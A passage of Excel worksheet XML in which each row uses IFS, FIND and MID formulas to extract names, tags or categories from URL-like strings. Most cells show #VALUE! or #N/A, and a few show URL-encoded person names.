    </row>
    <row r="2281" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2281" t="s">
        <v>2248</v>
      </c>
      <c r="B2281" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2281" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2281" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2281" t="e" cm="1">
        <f t="array" ref="E2281">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2281)), MID($A2281, FIND("name=",$A2281) + 5, LEN($A2281) - FIND("name=",$A2281)),
    ISNUMBER(FIND("tag/",$A2281)), MID($A2281, FIND("tag/",$A2281) + 4, LEN($A2281) - FIND("tag/",$A2281)),
    ISNUMBER(FIND("category",$A2281)), MID($A2281, FIND("category",$A2281) + 9, LEN($A2281) - FIND("category",$A2281)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2281" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2282" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2282" t="s">
        <v>2601</v>
      </c>
      <c r="B2282" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2282" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2282" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2282" t="e" cm="1">
        <f t="array" ref="E2282">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2282)), MID($A2282, FIND("name=",$A2282) + 5, LEN($A2282) - FIND("name=",$A2282)),
    ISNUMBER(FIND("tag/",$A2282)), MID($A2282, FIND("tag/",$A2282) + 4, LEN($A2282) - FIND("tag/",$A2282)),
    ISNUMBER(FIND("category",$A2282)), MID($A2282, FIND("category",$A2282) + 9, LEN($A2282) - FIND("category",$A2282)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2282" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2283" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2283" t="s">
        <v>2346</v>
      </c>
      <c r="B2283" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2283" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2283" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2283" t="e" cm="1">
        <f t="array" ref="E2283">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2283)), MID($A2283, FIND("name=",$A2283) + 5, LEN($A2283) - FIND("name=",$A2283)),
    ISNUMBER(FIND("tag/",$A2283)), MID($A2283, FIND("tag/",$A2283) + 4, LEN($A2283) - FIND("tag/",$A2283)),
    ISNUMBER(FIND("category",$A2283)), MID($A2283, FIND("category",$A2283) + 9, LEN($A2283) - FIND("category",$A2283)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2283" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2284" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2284" t="s">
        <v>2368</v>
      </c>
      <c r="B2284" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2284" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2284" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2284" t="e" cm="1">
        <f t="array" ref="E2284">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2284)), MID($A2284, FIND("name=",$A2284) + 5, LEN($A2284) - FIND("name=",$A2284)),
    ISNUMBER(FIND("tag/",$A2284)), MID($A2284, FIND("tag/",$A2284) + 4, LEN($A2284) - FIND("tag/",$A2284)),
    ISNUMBER(FIND("category",$A2284)), MID($A2284, FIND("category",$A2284) + 9, LEN($A2284) - FIND("category",$A2284)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2284" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2285" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2285" t="s">
        <v>2548</v>
      </c>
      <c r="B2285" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2285" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2285" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2285" t="e" cm="1">
        <f t="array" ref="E2285">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2285)), MID($A2285, FIND("name=",$A2285) + 5, LEN($A2285) - FIND("name=",$A2285)),
    ISNUMBER(FIND("tag/",$A2285)), MID($A2285, FIND("tag/",$A2285) + 4, LEN($A2285) - FIND("tag/",$A2285)),
    ISNUMBER(FIND("category",$A2285)), MID($A2285, FIND("category",$A2285) + 9, LEN($A2285) - FIND("category",$A2285)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2285" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2286" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2286" t="s">
        <v>2248</v>
      </c>
      <c r="B2286" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2286" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2286" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2286" t="e" cm="1">
        <f t="array" ref="E2286">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2286)), MID($A2286, FIND("name=",$A2286) + 5, LEN($A2286) - FIND("name=",$A2286)),
    ISNUMBER(FIND("tag/",$A2286)), MID($A2286, FIND("tag/",$A2286) + 4, LEN($A2286) - FIND("tag/",$A2286)),
    ISNUMBER(FIND("category",$A2286)), MID($A2286, FIND("category",$A2286) + 9, LEN($A2286) - FIND("category",$A2286)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2286" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2287" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2287" t="s">
        <v>2248</v>
      </c>
      <c r="B2287" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2287" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2287" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2287" t="e" cm="1">
        <f t="array" ref="E2287">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2287)), MID($A2287, FIND("name=",$A2287) + 5, LEN($A2287) - FIND("name=",$A2287)),
    ISNUMBER(FIND("tag/",$A2287)), MID($A2287, FIND("tag/",$A2287) + 4, LEN($A2287) - FIND("tag/",$A2287)),
    ISNUMBER(FIND("category",$A2287)), MID($A2287, FIND("category",$A2287) + 9, LEN($A2287) - FIND("category",$A2287)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2287" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2288" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2288" t="s">
        <v>2248</v>
      </c>
      <c r="B2288" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2288" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2288" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2288" t="e" cm="1">
        <f t="array" ref="E2288">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2288)), MID($A2288, FIND("name=",$A2288) + 5, LEN($A2288) - FIND("name=",$A2288)),
    ISNUMBER(FIND("tag/",$A2288)), MID($A2288, FIND("tag/",$A2288) + 4, LEN($A2288) - FIND("tag/",$A2288)),
    ISNUMBER(FIND("category",$A2288)), MID($A2288, FIND("category",$A2288) + 9, LEN($A2288) - FIND("category",$A2288)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2288" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2289" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2289" t="s">
        <v>2248</v>
      </c>
      <c r="B2289" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2289" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2289" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2289" t="e" cm="1">
        <f t="array" ref="E2289">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2289)), MID($A2289, FIND("name=",$A2289) + 5, LEN($A2289) - FIND("name=",$A2289)),
    ISNUMBER(FIND("tag/",$A2289)), MID($A2289, FIND("tag/",$A2289) + 4, LEN($A2289) - FIND("tag/",$A2289)),
    ISNUMBER(FIND("category",$A2289)), MID($A2289, FIND("category",$A2289) + 9, LEN($A2289) - FIND("category",$A2289)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2289" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2290" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2290" t="s">
        <v>2560</v>
      </c>
      <c r="B2290" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2290" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2290" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2290" t="e" cm="1">
        <f t="array" ref="E2290">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2290)), MID($A2290, FIND("name=",$A2290) + 5, LEN($A2290) - FIND("name=",$A2290)),
    ISNUMBER(FIND("tag/",$A2290)), MID($A2290, FIND("tag/",$A2290) + 4, LEN($A2290) - FIND("tag/",$A2290)),
    ISNUMBER(FIND("category",$A2290)), MID($A2290, FIND("category",$A2290) + 9, LEN($A2290) - FIND("category",$A2290)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2290" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2291" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2291" t="s">
        <v>2248</v>
      </c>
      <c r="B2291" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2291" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2291" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2291" t="e" cm="1">
        <f t="array" ref="E2291">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2291)), MID($A2291, FIND("name=",$A2291) + 5, LEN($A2291) - FIND("name=",$A2291)),
    ISNUMBER(FIND("tag/",$A2291)), MID($A2291, FIND("tag/",$A2291) + 4, LEN($A2291) - FIND("tag/",$A2291)),
    ISNUMBER(FIND("category",$A2291)), MID($A2291, FIND("category",$A2291) + 9, LEN($A2291) - FIND("category",$A2291)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2291" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2292" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2292" t="s">
        <v>2248</v>
      </c>
      <c r="B2292" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2292" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2292" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2292" t="e" cm="1">
        <f t="array" ref="E2292">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2292)), MID($A2292, FIND("name=",$A2292) + 5, LEN($A2292) - FIND("name=",$A2292)),
    ISNUMBER(FIND("tag/",$A2292)), MID($A2292, FIND("tag/",$A2292) + 4, LEN($A2292) - FIND("tag/",$A2292)),
    ISNUMBER(FIND("category",$A2292)), MID($A2292, FIND("category",$A2292) + 9, LEN($A2292) - FIND("category",$A2292)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2292" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2293" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2293" t="s">
        <v>2601</v>
      </c>
      <c r="B2293" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2293" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2293" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2293" t="e" cm="1">
        <f t="array" ref="E2293">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2293)), MID($A2293, FIND("name=",$A2293) + 5, LEN($A2293) - FIND("name=",$A2293)),
    ISNUMBER(FIND("tag/",$A2293)), MID($A2293, FIND("tag/",$A2293) + 4, LEN($A2293) - FIND("tag/",$A2293)),
    ISNUMBER(FIND("category",$A2293)), MID($A2293, FIND("category",$A2293) + 9, LEN($A2293) - FIND("category",$A2293)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2293" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2294" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2294" t="s">
        <v>2248</v>
      </c>
      <c r="B2294" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2294" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2294" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2294" t="e" cm="1">
        <f t="array" ref="E2294">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2294)), MID($A2294, FIND("name=",$A2294) + 5, LEN($A2294) - FIND("name=",$A2294)),
    ISNUMBER(FIND("tag/",$A2294)), MID($A2294, FIND("tag/",$A2294) + 4, LEN($A2294) - FIND("tag/",$A2294)),
    ISNUMBER(FIND("category",$A2294)), MID($A2294, FIND("category",$A2294) + 9, LEN($A2294) - FIND("category",$A2294)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2294" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2295" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2295" t="s">
        <v>2248</v>
      </c>
      <c r="B2295" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2295" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2295" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2295" t="e" cm="1">
        <f t="array" ref="E2295">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2295)), MID($A2295, FIND("name=",$A2295) + 5, LEN($A2295) - FIND("name=",$A2295)),
    ISNUMBER(FIND("tag/",$A2295)), MID($A2295, FIND("tag/",$A2295) + 4, LEN($A2295) - FIND("tag/",$A2295)),
    ISNUMBER(FIND("category",$A2295)), MID($A2295, FIND("category",$A2295) + 9, LEN($A2295) - FIND("category",$A2295)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2295" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2296" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2296" t="s">
        <v>2248</v>
      </c>
      <c r="B2296" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2296" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2296" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2296" t="e" cm="1">
        <f t="array" ref="E2296">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2296)), MID($A2296, FIND("name=",$A2296) + 5, LEN($A2296) - FIND("name=",$A2296)),
    ISNUMBER(FIND("tag/",$A2296)), MID($A2296, FIND("tag/",$A2296) + 4, LEN($A2296) - FIND("tag/",$A2296)),
    ISNUMBER(FIND("category",$A2296)), MID($A2296, FIND("category",$A2296) + 9, LEN($A2296) - FIND("category",$A2296)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2296" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2297" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2297" t="s">
        <v>2560</v>
      </c>
      <c r="B2297" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2297" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2297" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2297" t="e" cm="1">
        <f t="array" ref="E2297">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2297)), MID($A2297, FIND("name=",$A2297) + 5, LEN($A2297) - FIND("name=",$A2297)),
    ISNUMBER(FIND("tag/",$A2297)), MID($A2297, FIND("tag/",$A2297) + 4, LEN($A2297) - FIND("tag/",$A2297)),
    ISNUMBER(FIND("category",$A2297)), MID($A2297, FIND("category",$A2297) + 9, LEN($A2297) - FIND("category",$A2297)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2297" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2298" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2298" t="s">
        <v>2601</v>
      </c>
      <c r="B2298" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2298" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2298" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2298" t="e" cm="1">
        <f t="array" ref="E2298">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2298)), MID($A2298, FIND("name=",$A2298) + 5, LEN($A2298) - FIND("name=",$A2298)),
    ISNUMBER(FIND("tag/",$A2298)), MID($A2298, FIND("tag/",$A2298) + 4, LEN($A2298) - FIND("tag/",$A2298)),
    ISNUMBER(FIND("category",$A2298)), MID($A2298, FIND("category",$A2298) + 9, LEN($A2298) - FIND("category",$A2298)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2298" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2299" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2299" t="s">
        <v>2560</v>
      </c>
      <c r="B2299" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2299" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2299" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2299" t="e" cm="1">
        <f t="array" ref="E2299">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2299)), MID($A2299, FIND("name=",$A2299) + 5, LEN($A2299) - FIND("name=",$A2299)),
    ISNUMBER(FIND("tag/",$A2299)), MID($A2299, FIND("tag/",$A2299) + 4, LEN($A2299) - FIND("tag/",$A2299)),
    ISNUMBER(FIND("category",$A2299)), MID($A2299, FIND("category",$A2299) + 9, LEN($A2299) - FIND("category",$A2299)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2299" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2300" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2300" t="s">
        <v>2368</v>
      </c>
      <c r="B2300" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2300" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2300" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2300" t="e" cm="1">
        <f t="array" ref="E2300">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2300)), MID($A2300, FIND("name=",$A2300) + 5, LEN($A2300) - FIND("name=",$A2300)),
    ISNUMBER(FIND("tag/",$A2300)), MID($A2300, FIND("tag/",$A2300) + 4, LEN($A2300) - FIND("tag/",$A2300)),
    ISNUMBER(FIND("category",$A2300)), MID($A2300, FIND("category",$A2300) + 9, LEN($A2300) - FIND("category",$A2300)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2300" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2301" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2301" t="s">
        <v>2726</v>
      </c>
      <c r="B2301" t="str">
        <f t="shared" si="106"/>
        <v>Bidisha%20Guha</v>
      </c>
      <c r="C2301" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2301" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2301" t="str" cm="1">
        <f t="array" ref="E2301">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2301)), MID($A2301, FIND("name=",$A2301) + 5, LEN($A2301) - FIND("name=",$A2301)),
    ISNUMBER(FIND("tag/",$A2301)), MID($A2301, FIND("tag/",$A2301) + 4, LEN($A2301) - FIND("tag/",$A2301)),
    ISNUMBER(FIND("category",$A2301)), MID($A2301, FIND("category",$A2301) + 9, LEN($A2301) - FIND("category",$A2301)))</f>
        <v>Bidisha%20Guha</v>
      </c>
      <c r="F2301" t="s">
        <v>3376</v>
      </c>
    </row>
    <row r="2302" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2302" t="s">
        <v>2601</v>
      </c>
      <c r="B2302" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2302" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2302" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2302" t="e" cm="1">
        <f t="array" ref="E2302">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2302)), MID($A2302, FIND("name=",$A2302) + 5, LEN($A2302) - FIND("name=",$A2302)),
    ISNUMBER(FIND("tag/",$A2302)), MID($A2302, FIND("tag/",$A2302) + 4, LEN($A2302) - FIND("tag/",$A2302)),
    ISNUMBER(FIND("category",$A2302)), MID($A2302, FIND("category",$A2302) + 9, LEN($A2302) - FIND("category",$A2302)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2302" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2303" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2303" t="s">
        <v>2727</v>
      </c>
      <c r="B2303" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2303" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2303" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2303" t="e" cm="1">
        <f t="array" ref="E2303">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2303)), MID($A2303, FIND("name=",$A2303) + 5, LEN($A2303) - FIND("name=",$A2303)),
    ISNUMBER(FIND("tag/",$A2303)), MID($A2303, FIND("tag/",$A2303) + 4, LEN($A2303) - FIND("tag/",$A2303)),
    ISNUMBER(FIND("category",$A2303)), MID($A2303, FIND("category",$A2303) + 9, LEN($A2303) - FIND("category",$A2303)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2303" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2304" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2304" t="s">
        <v>2560</v>
      </c>
      <c r="B2304" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2304" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2304" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2304" t="e" cm="1">
        <f t="array" ref="E2304">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2304)), MID($A2304, FIND("name=",$A2304) + 5, LEN($A2304) - FIND("name=",$A2304)),
    ISNUMBER(FIND("tag/",$A2304)), MID($A2304, FIND("tag/",$A2304) + 4, LEN($A2304) - FIND("tag/",$A2304)),
    ISNUMBER(FIND("category",$A2304)), MID($A2304, FIND("category",$A2304) + 9, LEN($A2304) - FIND("category",$A2304)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2304" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2305" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2305" t="s">
        <v>2368</v>
      </c>
      <c r="B2305" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2305" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2305" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2305" t="e" cm="1">
        <f t="array" ref="E2305">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2305)), MID($A2305, FIND("name=",$A2305) + 5, LEN($A2305) - FIND("name=",$A2305)),
    ISNUMBER(FIND("tag/",$A2305)), MID($A2305, FIND("tag/",$A2305) + 4, LEN($A2305) - FIND("tag/",$A2305)),
    ISNUMBER(FIND("category",$A2305)), MID($A2305, FIND("category",$A2305) + 9, LEN($A2305) - FIND("category",$A2305)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2305" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2306" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2306" t="s">
        <v>2248</v>
      </c>
      <c r="B2306" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2306" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2306" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2306" t="e" cm="1">
        <f t="array" ref="E2306">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2306)), MID($A2306, FIND("name=",$A2306) + 5, LEN($A2306) - FIND("name=",$A2306)),
    ISNUMBER(FIND("tag/",$A2306)), MID($A2306, FIND("tag/",$A2306) + 4, LEN($A2306) - FIND("tag/",$A2306)),
    ISNUMBER(FIND("category",$A2306)), MID($A2306, FIND("category",$A2306) + 9, LEN($A2306) - FIND("category",$A2306)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2306" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2307" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2307" t="s">
        <v>2728</v>
      </c>
      <c r="B2307" t="str">
        <f t="shared" si="106"/>
        <v>Asal%20Persian</v>
      </c>
      <c r="C2307" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2307" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2307" t="str" cm="1">
        <f t="array" ref="E2307">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2307)), MID($A2307, FIND("name=",$A2307) + 5, LEN($A2307) - FIND("name=",$A2307)),
    ISNUMBER(FIND("tag/",$A2307)), MID($A2307, FIND("tag/",$A2307) + 4, LEN($A2307) - FIND("tag/",$A2307)),
    ISNUMBER(FIND("category",$A2307)), MID($A2307, FIND("category",$A2307) + 9, LEN($A2307) - FIND("category",$A2307)))</f>
        <v>Asal%20Persian</v>
      </c>
      <c r="F2307" t="s">
        <v>3377</v>
      </c>
    </row>
    <row r="2308" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2308" t="s">
        <v>2496</v>
      </c>
      <c r="B2308" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2308" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2308" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2308" t="e" cm="1">
        <f t="array" ref="E2308">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2308)), MID($A2308, FIND("name=",$A2308) + 5, LEN($A2308) - FIND("name=",$A2308)),
    ISNUMBER(FIND("tag/",$A2308)), MID($A2308, FIND("tag/",$A2308) + 4, LEN($A2308) - FIND("tag/",$A2308)),
    ISNUMBER(FIND("category",$A2308)), MID($A2308, FIND("category",$A2308) + 9, LEN($A2308) - FIND("category",$A2308)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2308" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2309" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2309" t="s">
        <v>2377</v>
      </c>
      <c r="B2309" t="e">
        <f t="shared" si="106"/>
        <v>#VALUE!</v>
      </c>
      <c r="C2309" t="e">
        <f t="shared" si="107"/>
        <v>#VALUE!</v>
      </c>
      <c r="D2309" t="e">
        <f t="shared" si="108"/>
        <v>#VALUE!</v>
      </c>
      <c r="E2309" t="e" cm="1">
        <f t="array" ref="E2309">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A2309)), MID($A2309, FIND("name=",$A2309) + 5, LEN($A2309) - FIND("name=",$A2309)),
    ISNUMBER(FIND("tag/",$A2309)), MID($A2309, FIND("tag/",$A2309) + 4, LEN($A2309) - FIND("tag/",$A2309)),
    ISNUMBER(FIND("category",$A2309)), MID($A2309, FIND("category",$A2309) + 9, LEN($A2309) - FIND("category",$A2309)))</f>
        <v>#N/A</v>
      </c>
      <c r="F2309" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="2310" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2310" t="s">
        <v>2560</v>
      </c>
      <c r="B2310" t="e">
        <f t="shared" ref="B2310:B2373" si="109">IF(FIND("name=",A2310,1)&gt;0,MID(A2310,FIND("name=",A2310,1)+5,LEN(A2310)-FIND("name=",A2310,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C2310" t="e">
